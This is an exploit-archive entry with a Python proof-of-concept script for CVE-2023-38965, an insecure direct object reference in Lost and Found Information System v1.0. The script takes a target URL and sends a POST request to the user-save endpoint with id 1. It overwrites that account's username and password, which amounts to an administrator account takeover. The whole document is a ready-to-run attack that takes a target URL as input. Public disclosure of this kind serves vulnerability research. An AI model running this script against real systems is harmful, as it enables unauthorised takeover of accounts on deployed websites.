# Exploit Title: Lost and Found Information System v1.0 - idor leads to Account Take over # Date: 2023-12-03 # Exploit Author: OR4NG.M4N # Category : webapps # CVE : CVE-2023-38965 Python p0c : import argparse import requests import time parser = argparse.ArgumentParser(description='Send a POST request to the target server') parser.add_argument('-url', help='URL of the target', required=True) parser.add_argument('-user', help='Username', required=True) parser.add_argument('-password', help='Password', required=True) args = parser.parse_args() url = args.url + '/classes/Users.php?f=save' data = { 'id': '1', 'firstname': 'or4ng', 'middlename': '', 'lastname': 'Admin', 'username': args.user, 'password': args.password } response = requests.post(url, data) if b"1" in response.content: print("Exploit ..") time.sleep(1) print("User :" + args.user + "\nPassword :" + args.password) else: print("Exploit Failed..")